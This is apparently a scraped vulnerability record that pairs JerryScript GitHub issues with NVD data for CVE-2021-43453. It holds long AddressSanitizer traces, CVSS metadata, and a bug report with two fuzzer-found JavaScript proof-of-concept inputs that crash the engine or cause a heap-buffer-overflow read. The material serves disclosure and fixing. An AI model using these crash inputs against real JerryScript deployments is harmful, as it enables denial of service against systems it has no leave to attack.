0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #115 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #116 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #117 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #118 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #119 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #120 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #121 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #122 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #123 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #124 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #125 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #126 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #127 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #128 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #129 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #130 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #131 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #132 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #133 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #134 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #135 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #136 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #137 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #138 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #139 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #140 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #141 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #142 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #143 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #144 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #145 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #146 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #147 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #148 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #149 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #150 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #151 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #152 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #153 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #154 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #155 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #156 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #157 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #158 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #159 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #160 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #161 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #162 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #163 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #164 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #165 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #166 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #167 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #168 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #169 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #170 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #171 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #172 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #173 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #174 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #175 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #176 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #177 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #178 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #179 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #180 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #181 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #182 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #183 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #184 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #185 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #186 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #187 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #188 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #189 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #190 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #191 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #192 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #193 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #194 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #195 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #196 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #197 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #198 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #199 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #200 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #201 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #202 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #203 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #204 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #205 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #206 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #207 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #208 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #209 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #210 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #211 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #212 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #213 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #214 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #215 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #216 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #217 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #218 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #219 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #220 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #221 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #222 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #223 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #224 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #225 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #226 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #227 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #228 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #229 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #230 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #231 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #232 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #233 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #234 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #235 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #236 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #237 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #238 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #239 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #240 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #241 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #242 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #243 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #244 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #245 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #246 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #247 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #248 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #249 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #250 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #251 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #252 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #253 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #254 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #255 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #256 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #257 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #258 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #259 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #260 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #261 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #262 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #263 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #264 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #265 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #266 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #267 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #268 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #269 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #270 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #271 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #272 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #273 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #274 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #275 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #276 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #277 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #278 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #279 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #280 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #281 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #282 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #283 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #284 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #285 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #286 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #287 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #288 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #289 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #290 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #291 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #292 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #293 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #294 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #295 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #296 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #297 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #298 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #299 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #300 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #301 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #302 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 #303 0x568190a3 in vm_run /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5338 #304 0x56701549 in ecma_op_function_call_simple /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1131 #305 0x56707c47 in ecma_op_function_construct /home/weiwei/Desktop/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1573 #306 0x56815ac8 in opfunc_construct /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:884 #307 0x56815ac8 in vm_execute /home/weiwei/Desktop/jerryscript/jerry-core/vm/vm.c:5258 SUMMARY: AddressSanitizer: stack-overflow (/lib32/libasan.so.5+0x113bda) in __interceptor_malloc ==1259593==ABORTING ``` ###### Backtrace see above
stack-overflow in jmem_heap_alloc_block_internal
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4779/comments
5
2021-09-23T13:13:53Z
2021-10-18T12:47:01Z
https://github.com/jerryscript-project/jerryscript/issues/4779
1,005,422,113
4,779
CVE-2021-43453
2022-04-07T21:15:07.517
A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4754" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "6CA39B32-B4C8-4430-A138-4C35D325F832", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4754
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision ```sh $ jerry --version Version: 3.0.0 (5a69b183) ``` ###### Build platform ```sh $ echo "$(lsb_release -ds) ($(uname -mrs))" Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64) ``` ###### Build steps ```sh $ python tools/build.py ``` ###### Test case There are two test cases, where `jerry_poc_crash.js` can trigger a direct crash of the clean-built jerry and `jerry_poc_asan.js` can trigger a heap-overflow of the ASAN-enabled-built jerry. This bug is found by a naive fuzzer. And I use `afl-tmin` to reduce the test cases. I sincerely apologize for making them struggling. + jerry_poc_crash.js ```js R=function(){({0:0}) function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0=function(){} class e ``` + jerry_poc_asan.js ```js R = function() { function x(){ function y(){ for(;;) for(function(){ class A extends function() { for(let;;) { ((function(){})) } ``` ###### Execution steps ```sh $ ~/release/jerryscript/build/bin/jerry jerry_poc_crash.js Segmentation fault (core dumped) ``` ```sh $ ~/asan/jerryscript/build/bin/jerry jerry_poc_asan.js ==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010 READ of size 1 at 0x612000005692 thread T0 #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e) #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2) #3 0x55555579d5c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9) #4 0x5555555dead1 (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1) #5 0x555555633868 (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868) #6 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #7 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #8 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #9 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #10 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #11 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #12 0x55555563e211 (/home/docker/asan/jerryscript/build/bin/jerry+0xea211) #13 0x5555555c1f67 (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67) #14 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #15 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #16 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #17 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #18 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #19 0x555555625454 (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454) #20 0x555555634129 (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129) #21 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #22 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #23 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #24 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #25 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #26 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #27 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #28 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #29 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #30 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #31 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #32 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #33 0x5555555ca181 (/home/docker/asan/jerryscript/build/bin/jerry+0x76181) #34 0x5555557c982d (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d) #35 0x55555592b342 (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342) #36 0x5555555718c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9) #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #38 0x555555580add (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd) Address 0x612000005692 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) Shadow bytes around the buggy address: 0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 